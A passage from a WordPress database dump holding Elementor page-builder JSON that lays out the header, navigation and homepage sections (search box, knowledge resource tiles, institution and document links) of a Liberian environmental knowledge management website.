"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(13125,2129,'_elementor_version','2.7.5'),(13126,2129,'_elementor_template_type','wp-post'),(13130,2130,'_wp_page_template','elementor_canvas'),(13131,2130,'_elementor_edit_mode','builder'),(13132,2130,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"60\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":12.48799999999999954525264911353588104248046875,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":66.647999999999996134647517465054988861083984375,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge<br> Management System\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_font_family\":\"Roboto Slab\",\"text_shadow_text_shadow\":{\"horizontal\":16,\"vertical\":0,\"blur\":10,\"color\":\"rgba(0,0,0,0.3)\"}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4n8x0v8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":20.8599999999999994315658113919198513031005859375,\"css_classes\":\"hide-1024\"},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(13133,2130,'_elementor_version','2.7.5'),(13134,2130,'_elementor_template_type','wp-post'),(13137,2131,'_wp_page_template','elementor_canvas'),(13138,2131,'_elementor_edit_mode','builder'),(13139,2131,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"60\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":12.48799999999999954525264911353588104248046875,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":66.647999999999996134647517465054988861083984375,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge<br> Management System\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_font_family\":\"Roboto Slab\",\"text_shadow_text_shadow\":{\"horizontal\":16,\"vertical\":0,\"blur\":10,\"color\":\"rgba(0,0,0,0.3)\"},\"typography_line_height\":{\"unit\":\"em\",\"size\":1,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4n8x0v8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":20.8599999999999994315658113919198513031005859375,\"css_classes\":\"hide-1024\"},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(13140,2131,'_elementor_version','2.7.5'),(13141,2131,'_elementor_template_type','wp-post'),(13144,2132,'_wp_page_template','default'),(13145,2132,'_elementor_edit_mode','builder'),(13146,2132,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(17,59,102,0.83)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas 